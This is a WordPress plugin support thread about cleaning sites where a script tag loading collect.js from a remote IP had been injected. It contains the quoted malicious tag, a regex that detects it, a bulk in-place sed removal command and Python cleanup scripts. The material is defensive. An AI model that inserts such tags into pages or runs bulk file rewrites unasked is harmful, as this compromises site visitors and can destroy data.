Support » Plugin: Anti-Malware Security and Brute-Force Firewall » MW:SPAM:SEO spam problem

  • Resolved th3rion

    (@th3rion)


    Hi

    I recently had a problem with backdoor trojans and malware. On my server 9 sites were infected. With this plugin I managed to get rid of the infection on all of them, but I can’t clean one.

    This plugin says the site is clean, but Sucuri detects MW:SPAM:SEO.

    I manually updated all of the WP core files, so everything should have the same date, but some of the files have a newer date. I compared the original core files and the modified files, and all of them have somewhere a script with such a link:

    I don’t know where to look for the cause of the infection – I think updating files won’t help.

    https://wordpress.org/plugins/gotmls/

Viewing 15 replies - 16 through 30 (of 58 total)
  • Plugin Author Eli

    (@scheeeli)

    My plugin will remove that script tag from every file on your site if you have the latest Definition update installed.

    If you are looking for a command-line solution andrijaf already mentioned a command to do this earlier in this support thread. However, as your script tag is a little different, I would recommend a slight alteration:

    find ./ \( -name '*.html' -o -name '*.php' \) -exec sed -i 's#<script[^>]*src="http://122\.155\.168\.105/ads/inpage/pub/collect\.js"[^>]*></script>##g' '{}' \;

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    the quick fix?

    1. If the current theme is (folder renamed)
    2. New theme uploaded instead … will it work?

    but, then, can this plugin protect against the next attacks?

    Not to rain on anyone’s parade again, but that won’t work. When your site is hacked then you need to delouse your installation. Just renaming things doesn’t do that and is ineffective against the backdoors that get installed that you haven’t found.

    We got hit by this thing as well. It hit my WordPress site, sub-domains, and my custom html and php pages. Luckily I was able to restore from a recent backup, then patched up everything I could and installed Wordfence and Eli’s Malware to keep an eye on things. Great job on the Malware program Eli, I will be donating shortly!!!!!

    Does anyone have any other suggestions on programs to keep an eye or block this out from happening again?

    FYI, I also have Rev Slider, could that be the weakness?

    Does anyone have any clue what that collect.js was actually collecting?

    Old versions of rev slider are (pretty much) confirmed to have the vulnerability. Update to the latest. I don’t think this will clean your site, but it is supposed to be preventative. http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380

    Plugin Author Eli

    (@scheeeli)

    Not only does my plugin remove all these script injections mentioned in this thread, but now it automatically blocks the root cause of most of these new infections.

    I just released a new plugin update that automatically blocks attempts to exploit the Slider Revolution vulnerability. Install version 4.14.51 of my Anti-Malware plugin and your site will be protected from this Local File Inclusion (LFI) threat.

    ok. sounds good,

    I have installed other plugins such as

    Wordfence
    Firewall 2
    Acunetix

    should I delete them or how do they interact with your plugin?

    thanks for quick answers

    I have a couple of sites infected and blocked and noticed the script immediately as well. (Files changed 12/14/2014. Callout script: <script type="text/javascript" src="http://122.155.168.105/ads/inpage/pub/collect.js"></script>)

    Since /wp-login is blocked due to the script (I think), I am downloading the full sites using Dreamweaver and doing a full site find-and-replace using the script code and replacing it with a blank space. After that, I will re-upload all the changed files, then log in to WP, install and load up Eli’s plugin: https://wordpress.org/plugins/gotmls/ (thanks for that Eli), run a full scan using it and then check the sites using Google Webmaster Tools to see if everything has been removed.

    I’ll post back once this is done and let you know how it goes.

    I found at: /wp-admin/install.php someone confirm me whether there has also

    my scan found around 20 infected files. The code is injected just before the ending /head tag.

    My method mentioned above appears to have worked. My sites are back online after requesting that Google rescan and whitelist them again. Further scans reveal no infections. Eli, nice plugin, sir! Will send some money your way…

    This code will inject itself into just about every js, php, and html page you have. Use Eli’s code to clean it if you can access your wp-admin. If not, hopefully your host has a backup to restore to, which makes it a ton easier.

    Also guys, with the full version of wordfence you can utilize their country block to block all traffic coming from particular countries like Russia and Taiwan. Prolly won’t help proxies, but it can help you cut it down.

    Eli, it seems to be catching lots of problems (2 backdoor scripts and 92 known threats and I’m only at 18%), if it works I will regard you as God and make a donation.
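The cleanup the posters above describe (find the injected collect.js script tag in every php/html/js file and strip it) can be done with a small scanner that reports before it touches anything. The following is an added example and not code from the GOTMLS plugin or from anyone in this thread; it uses only the indicator quoted above (the script tag loading collect.js from 122.155.168.105), the file extensions posters reported as modified, and a constructed sample site written to a temporary directory.

```python
# Added example, not the GOTMLS plugin's own code: find and strip the
# injected collect.js script tag reported in this thread across a site tree.
import os
import re
import tempfile

# The indicator from the thread: a <script> tag whose src is the collect.js
# URL on 122.155.168.105. Attribute order, quote style and whitespace may
# vary, so the pattern tolerates those, but it anchors on that exact host and
# path so a legitimate script tag with a different src is never touched.
INJECTED_TAG = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']http://122\.155\.168\.105/ads/inpage/pub/collect\.js["\']'
    r'[^>]*>\s*</script>',
    re.IGNORECASE,
)

# File types posters in the thread found modified.
SCAN_EXTENSIONS = ('.php', '.html', '.htm', '.js')


def clean_content(text):
    """Return (text with every injected tag removed, number of tags removed)."""
    return INJECTED_TAG.subn('', text)


def scan_tree(root, fix=False):
    """Walk `root` and return {relative path: hit count} for files carrying the tag.
    With fix=True the tag is stripped in place and the original is kept as <file>.bak."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='surrogateescape', newline='') as fh:
                original = fh.read()
            cleaned, count = clean_content(original)
            if count == 0:
                continue
            findings[os.path.relpath(path, root)] = count
            if fix:
                # keep the original next to the cleaned file as evidence
                with open(path + '.bak', 'w', encoding='utf-8', errors='surrogateescape', newline='') as fh:
                    fh.write(original)
                with open(path, 'w', encoding='utf-8', errors='surrogateescape', newline='') as fh:
                    fh.write(cleaned)
    return findings


# Constructed sample site (not real infected files): one page with the tag
# just before </head> as reported in the thread, plus two clean files.
SAMPLE_FILES = {
    'index.php': (
        '<html><head><title>site</title>\n'
        '<script type="text/javascript" src="http://122.155.168.105/ads/inpage/pub/collect.js"></script>'
        '</head><body>ok</body></html>\n'
    ),
    'wp-content/themes/t/app.js': 'console.log("hello");\n',
    'about.html': '<head><script src="/js/local.js"></script></head>\n',
}


def build_sample_site():
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix='gotmls_demo_')
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'w', encoding='utf-8', newline='') as fh:
            fh.write(content)
    return root


def demo():
    """Dry run, then fix, then rescan; returns (findings before, findings after)."""
    root = build_sample_site()
    before = scan_tree(root)            # report only
    scan_tree(root, fix=True)           # strip the tag, keep .bak copies
    after = scan_tree(root)
    return before, after


if __name__ == '__main__':
    before, after = demo()
    print('before:', before)
    print('after:', after)
```

Run it once without `fix=True` and review the list of files before rewriting anything; the `.bak` copies keep the original content for later review. Stripping the tag only removes the payload; as the moderator notes above, the backdoor and the entry point (the Slider Revolution hole mentioned in this thread) still have to be dealt with separately.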

    Hi
    well I am facing the same issue.
    Now I am scanning with Eli’s plugin, for which I thank him in advance and which will probably deserve my donation.
    I have a WP installation in a subfolder; in the meanwhile I found many files (html but maybe also others…) that have been “injected” also in the root domain. So I wonder if Eli’s plugin could also scan the root, or if it starts in the directory where it is installed.
    If you have another solution for scanning other folders or the root, or even instructions on how to use the command line, I will appreciate it.
    thanks Eli and good luck to all

    Plugin Author Eli

    (@scheeeli)

    My plugin is supposed to detect the directory level of the root site, but that doesn’t always work right on some sites that are installed in a sub-directory.

    You can change the scan_level value in the DB from i:3 to i:4 to get at the parent directory. The scan_level value is stored in the wp_options table where the option_name equals ‘GOTMLS_settings_array’. Be careful changing that value though because it’s a serialized array, so one wrong character and it won’t be readable by my plugin. Changing that one simple value should be safe though (the worst thing that could happen if you get it wrong would be that all the settings go back to the defaults).

    Alternatively, you can email me your Installation Key and I can upgrade your scan_level in the Definition Updates.

    Thanks again to everyone for contributing to my plugin. I’m really excited that it’s now able to fend off this new threat that has already hit so many WordPress sites.

    Please let me know if there is anything else.

    Aloha, Eli
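The warning above about the serialized array is worth seeing concretely: PHP's serialize() format prefixes every string with its byte length, so an edit that changes a length, or a stray character, makes unserialize() fail and the plugin falls back to defaults. The code below is an added example, not part of the GOTMLS plugin, that parses the option value, changes one key (here scan_level from 3 to 4, as described above) and re-serializes it with the lengths recomputed, refusing to emit anything that does not round-trip. The SAMPLE value is constructed; the real GOTMLS_settings_array has more keys than this.

```python
# Added example (not code from the GOTMLS plugin): read a PHP-serialized
# settings array such as GOTMLS_settings_array, change one key, and
# re-serialize it with correct lengths. Works on bytes because PHP string
# lengths are byte counts, not character counts.


def _parse(data, pos):
    """Parse one PHP-serialized value at data[pos]; return (value, next_pos).
    Arrays come back as ordered lists of (key, value) pairs."""
    t = data[pos:pos + 1]
    if t == b'N':                                   # N;
        return None, pos + 2
    if t in (b'i', b'b', b'd'):                     # i:3;  b:1;  d:0.5;
        end = data.index(b';', pos)
        raw = data[pos + 2:end].decode('ascii')
        val = {b'i': int, b'b': lambda s: bool(int(s)), b'd': float}[t](raw)
        return val, end + 1
    if t == b's':                                   # s:10:"scan_level";
        colon = data.index(b':', pos + 2)
        length = int(data[pos + 2:colon].decode('ascii'))
        start = colon + 2                           # skip :"
        payload = data[start:start + length]
        if data[start + length:start + length + 2] != b'";':
            raise ValueError('string length does not match payload at offset %d' % pos)
        return payload.decode('utf-8'), start + length + 2
    if t == b'a':                                   # a:2:{key;value;...}
        colon = data.index(b':', pos + 2)
        count = int(data[pos + 2:colon].decode('ascii'))
        p = colon + 2                               # skip :{
        items = []
        for _ in range(count):
            key, p = _parse(data, p)
            val, p = _parse(data, p)
            items.append((key, val))
        if data[p:p + 1] != b'}':
            raise ValueError('array not terminated at offset %d' % p)
        return items, p + 1
    raise ValueError('unsupported type %r at offset %d' % (t, pos))


def _dump(value):
    """Inverse of _parse: serialize a Python value back to PHP format."""
    if value is None:
        return b'N;'
    if isinstance(value, bool):                     # before int: bool is an int subclass
        return b'b:%d;' % int(value)
    if isinstance(value, int):
        return b'i:%d;' % value
    if isinstance(value, float):
        return ('d:%r;' % value).encode('ascii')
    if isinstance(value, str):
        raw = value.encode('utf-8')
        return b's:%d:"' % len(raw) + raw + b'";'
    if isinstance(value, list):
        body = b''.join(_dump(k) + _dump(v) for k, v in value)
        return b'a:%d:{' % len(value) + body + b'}'
    raise TypeError('cannot serialize %r' % type(value))


def is_readable(serialized):
    """True if the whole blob parses, i.e. PHP's unserialize() would accept it."""
    try:
        _, end = _parse(serialized, 0)
        return end == len(serialized)
    except (ValueError, IndexError):
        return False


def set_option(serialized, key, new_value):
    """Return a copy of the serialized array with `key` set to `new_value`."""
    tree, end = _parse(serialized, 0)
    if end != len(serialized) or not isinstance(tree, list):
        raise ValueError('not a single serialized array')
    if key not in [k for k, _ in tree]:
        raise KeyError(key)
    updated = [(k, new_value if k == key else v) for k, v in tree]
    out = _dump(updated)
    if not is_readable(out):                        # round-trip check before it goes in the DB
        raise ValueError('re-serialized value does not parse')
    return out


# Constructed sample option_value; the real GOTMLS_settings_array has more keys.
SAMPLE = b'a:3:{s:10:"scan_level";i:3;s:7:"example";s:3:"abc";s:5:"flags";a:1:{i:0;b:1;}}'

if __name__ == '__main__':
    print(set_option(SAMPLE, 'scan_level', 4).decode())
```

Read the current option_value out of wp_options (option_name 'GOTMLS_settings_array', as stated above), keep a copy of it, run it through set_option, and only write back the value that passed is_readable. The same parser also tells you in advance whether a hand-edited value would have been accepted: a blob with a wrong string length fails is_readable instead of silently resetting the plugin's settings.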

  • The topic ‘MW:SPAM:SEO spam problem’ is closed to new replies.